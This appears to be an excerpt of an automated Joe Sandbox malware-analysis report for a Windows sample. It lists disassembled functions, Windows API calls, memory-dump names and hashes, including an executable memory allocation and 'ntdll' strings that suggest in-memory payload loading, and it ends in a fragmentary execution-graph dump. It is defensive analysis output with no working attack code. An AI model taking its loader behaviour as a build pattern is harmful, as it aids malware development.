                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: AddressHandleLoadModuleProc
                                                • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                                                • API String ID: 3055805555-3733552308
                                                • Opcode ID: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                                                • Instruction ID: 601bfb796087d826a15eddab62e6da73c6b3e4e45b37998f9684764b2688f2d2
                                                • Opcode Fuzzy Hash: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                                                • Instruction Fuzzy Hash: 5C2136B1614B8582EB66DB23F8407DAA3A5B79C7C0F880526BB49577B5EF78C500C700
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Process$CurrentSizeWorking
                                                • String ID: Shrinking process size
                                                • API String ID: 2122760700-652428428
                                                • Opcode ID: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                                                • Instruction ID: de407452bcc55573093b25e37d4a5c8190b9a80636e05c4b95c6e58ff86151e7
                                                • Opcode Fuzzy Hash: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                                                • Instruction Fuzzy Hash: 74E0C9B4601A4191EA029F57A8A03D41260A74CBF0F815721AA290B2F0CE3985858310
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CriticalSection$Enter$Leave
                                                • String ID:
                                                • API String ID: 2801635615-0
                                                • Opcode ID: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                                                • Instruction ID: acd2e58e1a3fd81a861280768b65888603737fa84cc19007189881c9ae716cb0
                                                • Opcode Fuzzy Hash: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                                                • Instruction Fuzzy Hash: D331137A225A4082EB128F1AF8407D57364F79DBF5F480221FF6A4B7B4DB3AC8858744
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                • String ID:
                                                • API String ID: 2718003287-0
                                                • Opcode ID: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                                                • Instruction ID: 831bd74ffc12c5f41fda9ef2ef6850ebfc3f13e5dfc29575dc48f9cabb7a5d4b
                                                • Opcode Fuzzy Hash: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                                                • Instruction Fuzzy Hash: 61D1E536B0AA8189E720CF65D4502EC37B1F744BE8B508275CE6D57B9ADF38D426D348
                                                APIs
                                                • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFDAC08ED07), ref: 00007FFDAC08EE38
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFDAC08ED07), ref: 00007FFDAC08EEC3
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: ConsoleErrorLastMode
                                                • String ID:
                                                • API String ID: 953036326-0
                                                • Opcode ID: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                                • Instruction ID: f5a841966cede3ab7143a6a6749f2183fc8730fd293be8935db19f8c6b958536
                                                • Opcode Fuzzy Hash: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                                • Instruction Fuzzy Hash: 3E91F536B1A65189F7708F3594602BC3BA0AB44BE8F148179DE2E53786CF38D465E71C
                                                APIs
                                                • EnterCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004774
                                                • ResetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004870
                                                • SetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000487D
                                                • LeaveCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000488A
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CriticalEventSection$EnterLeaveReset
                                                • String ID:
                                                • API String ID: 3553466030-0
                                                • Opcode ID: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                                • Instruction ID: 8df361fa7c869b6ec715234f9c2df2ced8c6baf833446e4218a9444c3b5dacad
                                                • Opcode Fuzzy Hash: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                                • Instruction Fuzzy Hash: 0F31D1B5614F4881EB42CB57F8803D463A6B79CBD4F984516EB0E8B372EF3AC4958304
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CriticalEventSection$EnterLeaveReset
                                                • String ID:
                                                • API String ID: 3553466030-0
                                                • Opcode ID: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                                • Instruction ID: 80aeca48758360c6ba791d23c15ba34d7cc547f8c7a26c6fbcbbb07f4ec0a80e
                                                • Opcode Fuzzy Hash: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                                • Instruction Fuzzy Hash: 6F3127B2220A8483D761DF27F48439AB3A0F798BD4F000116EB8A47BB5DF39E491C344
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                • String ID:
                                                • API String ID: 2933794660-0
                                                • Opcode ID: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                                • Instruction ID: 84b922cebee6e031bc73f859978ab8f1da5c54095d0e61aa5d6617facfc5e7ff
                                                • Opcode Fuzzy Hash: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                                • Instruction Fuzzy Hash: 80111C22B16B018AEB00CB60E8653B833A4F7597A8F440A31DA6D467A5DF78D165C348
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CreateEvent$CriticalInitializeSection
                                                • String ID:
                                                • API String ID: 926662266-0
                                                • Opcode ID: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                                • Instruction ID: 312f8d8d13b8a868d26f937b45fb8075aed367f1a83d8c92d196673213f535ba
                                                • Opcode Fuzzy Hash: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                                • Instruction Fuzzy Hash: 8F015A31610F0582E726DFA2B855BCA37E2F75D385F854529FA4A8B630EF3A8145C700
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: __except_validate_context_record
                                                • String ID: csm$csm
                                                • API String ID: 1467352782-3733052814
                                                • Opcode ID: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                                • Instruction ID: a9033f95390414428df578d1457c71d03723fac88dcb4f0de87b98eada1370c1
                                                • Opcode Fuzzy Hash: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                                • Instruction Fuzzy Hash: 4C71823260A6818AEB748F15946477D7BA0FB54BE4F14C135DE4C87B8ACB2CD461D74C
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CreateFrameInfo__except_validate_context_record
                                                • String ID: csm
                                                • API String ID: 2558813199-1018135373
                                                • Opcode ID: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                                                • Instruction ID: 898aa93b742497ef252fb90a2958d3989fba25a01843d796979c27e0c8e33343
                                                • Opcode Fuzzy Hash: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                                                • Instruction Fuzzy Hash: 4F515E3671AB4196D630AF15E45026E7BA4FB89BE0F109538EB8D07B56CF38E461DB08
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastWrite
                                                • String ID: U
                                                • API String ID: 442123175-4171548499
                                                • Opcode ID: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                                • Instruction ID: 1dd35de063abafbc7595bacd8de6eabc5a0ddab057c08abba736012461d27d19
                                                • Opcode Fuzzy Hash: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                                • Instruction Fuzzy Hash: 4041D532B1AA4182DB20CF65E4543AA77A0FB98BE4F408031EE9E87795DF3CD451DB48
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: ExceptionRaise
                                                • String ID: csm
                                                • API String ID: 3997070919-1018135373
                                                • Opcode ID: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                                • Instruction ID: 49e9958dea4625aba6399e71a496f31833793ec74c7c4936f150dd50c3eb5df3
                                                • Opcode Fuzzy Hash: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                                • Instruction Fuzzy Hash: 1D315036204A8082D771CF16E09079EB365F78C7E4F544111EF9A077B5DB3AD892CB41
                                                APIs
                                                  • Part of subcall function 00007FFDAC083A38: __except_validate_context_record.LIBVCRUNTIME ref: 00007FFDAC083A63
                                                • __GSHandlerCheckCommon.LIBCMT ref: 00007FFDAC090993
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CheckCommonHandler__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 1543384424-629598281
                                                • Opcode ID: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                                                • Instruction ID: 67ead92ac9278876deac68a229261b445595ed150de132fe90fe9e2591e1b38b
                                                • Opcode Fuzzy Hash: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                                                • Instruction Fuzzy Hash: D311B132B1979585EB209F66E4512A97764EB89FE4F08C035EE8807B57CF38D861D708
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: TimerWaitable
                                                • String ID: amps_Set: pHandle=%p, propId=%d, val=%p, vSize=%d
                                                • API String ID: 1823812067-484248852
                                                • Opcode ID: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                                • Instruction ID: 814455377fd743a09d1ce94c7697c2570c7384a68551c8a3e3690f56dccab0e4
                                                • Opcode Fuzzy Hash: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                                • Instruction Fuzzy Hash: 25114975608B4082EB21CF16B84079AB7A4F79DBD4F544225FF8847B79DB39C5508B40
                                                APIs
                                                • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFDAC08112F), ref: 00007FFDAC0839E0
                                                • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFDAC08112F), ref: 00007FFDAC083A21
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: ExceptionFileHeaderRaise
                                                • String ID: csm
                                                • API String ID: 2573137834-1018135373
                                                • Opcode ID: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                                                • Instruction ID: d21e5c7074c93faf3fa6cde89af3367c60497d3d31b1b95ad229fde64870252d
                                                • Opcode Fuzzy Hash: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                                                • Instruction Fuzzy Hash: 8E112B32619B8182EB218B19E45026977E5FB88BA4F588230DFCD47B59DF3CD562DB08
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: TimerWaitable
                                                • String ID: amps_Get: pHandle=%p, propId=%d, val=%p, vSize=%d
                                                • API String ID: 1823812067-3336177065
                                                • Opcode ID: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                                • Instruction ID: 709d983207ec740d9f2c7308925ee729c80a4ac6442fb255827ec98b57545574
                                                • Opcode Fuzzy Hash: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                                • Instruction Fuzzy Hash: 731170B2614B8082D711CF16F480B9AB7A4F38CBE4F444216BF9C47B68CF78C5508B40
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Heap$FreeProcess
                                                • String ID:
                                                • API String ID: 3859560861-0
                                                • Opcode ID: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                                                • Instruction ID: 86a4b35954e85bb75ec39e114bccfc50e282ec3ca0152174d73c8df7cd9b4be4
                                                • Opcode Fuzzy Hash: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                                                • Instruction Fuzzy Hash: ADF07FB4615B4481FB078FA7B84479422E5EB4DBC0F481028AB494B3B0DF7A80998710
                                                APIs
                                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 04DE01DF
                                                Memory Dump Source
                                                • Source File: 00000028.00000003.3469066038.0000000004DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_40_3_4de0000_G5CQjd.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                • Instruction ID: 2daf944824bbb8cc6c2a535a587c465a65460416b3ee7f6bcc81d72ec857f7e8
                                                • Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                • Instruction Fuzzy Hash: 73A13A70A00626EFDB16DFAAC980ABEB7F5FF48304B148169E415DB251D7B0EA51CB90
                                                APIs
                                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 04DE048B
                                                • VirtualFree.KERNELBASE(?,?,00004000), ref: 04DE04F1
                                                Memory Dump Source
                                                • Source File: 00000028.00000003.3469066038.0000000004DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_40_3_4de0000_G5CQjd.jbxd
                                                Similarity
                                                • API ID: Virtual$AllocFree
                                                • String ID:
                                                • API String ID: 2087232378-0
                                                • Opcode ID: 85e613f023628dd9a35c971c8f35ac366b6d7af4f068bcc7d0f9ba1c9b2aec73
                                                • Instruction ID: 31122c45f8b458042b7c588183f1f20478b02b77af4eb29194c5cbeedb3de88b
                                                • Opcode Fuzzy Hash: 85e613f023628dd9a35c971c8f35ac366b6d7af4f068bcc7d0f9ba1c9b2aec73
                                                • Instruction Fuzzy Hash: 7521C975A00215ABD721AEA58D84FBFB7F9EF04214F104468EA5AA2282D6B1B900D660
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000028.00000003.3469066038.0000000004DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_40_3_4de0000_G5CQjd.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: l$ntdl
                                                • API String ID: 0-924918826
                                                • Opcode ID: 6c9c6db97d8771c7cf8e0db104e1040736491d6c0939765109556fa2b78a9631
                                                • Instruction ID: ef9004203ace7abaf4a0e0abcb55fae33cadfc542da46b03c1fcbdcb1ea3afff
                                                • Opcode Fuzzy Hash: 6c9c6db97d8771c7cf8e0db104e1040736491d6c0939765109556fa2b78a9631
                                                • Instruction Fuzzy Hash: 0011BFB5700A11AFDB16EF19C408A1EBBF6FF88714B218559E009D7710EB74EA21CBE5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000028.00000003.3469066038.0000000004DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_40_3_4de0000_G5CQjd.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: l$ntdl
                                                • API String ID: 0-924918826
                                                • Opcode ID: 0c2c30aec7a625bf31c8c356953fe1e8142b6a83dabfcff9fbbd6bac14ed309e
                                                • Instruction ID: 1f897dac02f39eeea880021134faaf512c35ebf9ba47f65fea618204ab493af2
                                                • Opcode Fuzzy Hash: 0c2c30aec7a625bf31c8c356953fe1e8142b6a83dabfcff9fbbd6bac14ed309e
                                                • Instruction Fuzzy Hash: 95018871700114AFDB15EF99C845EAEFBB9EF85654F044069F904A7350DA70EE00CBA1

                                                Execution Graph

                                                Execution Coverage:6%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:1.3%
                                                Total number of Nodes:1047
                                                Total number of Limit Nodes:29
calls 3898->3899 3907 712fd7 _siglookup 3899->3907 3900 712fe8 3903 7120f9 __decode_pointer 6 API calls 3900->3903 3901 713007 3901->3900 3904 713016 3901->3904 3902->3898 3902->3900 3902->3901 3906 712fce 3902->3906 3903->3907 3905 712c72 __msize 66 API calls 3904->3905 3908 71301b 3905->3908 3906->3898 3906->3904 3910 71307d 3907->3910 3911 711697 _raise 66 API calls 3907->3911 3917 712fe0 __msize 3907->3917 3909 712c0a __msize 6 API calls 3908->3909 3909->3917 3912 712aa0 __lock 66 API calls 3910->3912 3913 713088 3910->3913 3911->3910 3912->3913 3914 7120f0 ___crtMessageBoxW 6 API calls 3913->3914 3915 7130bd 3913->3915 3914->3915 3921 713113 3915->3921 3917->3889 3919 711555 _doexit 66 API calls 3918->3919 3920 7116a8 3919->3920 3922 713120 3921->3922 3923 713119 3921->3923 3922->3917 3925 7129c6 LeaveCriticalSection 3923->3925 3925->3922 4420 711281 4423 71283c 4420->4423 4422 711286 4422->4422 4424 712861 4423->4424 4425 71286e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 4423->4425 4424->4425 4426 712865 4424->4426 4425->4426 4426->4422 4130 711242 4131 711251 4130->4131 4132 711257 4130->4132 4133 711697 _raise 66 API calls 4131->4133 4136 7116bc 4132->4136 4133->4132 4135 71125c __msize 4137 711555 _doexit 66 API calls 4136->4137 4138 7116c7 4137->4138 4138->4135 3190 711104 3227 71264c 3190->3227 3192 711110 GetStartupInfoW 3194 711133 3192->3194 3228 71261b HeapCreate 3194->3228 3196 711183 3230 71248e GetModuleHandleW 3196->3230 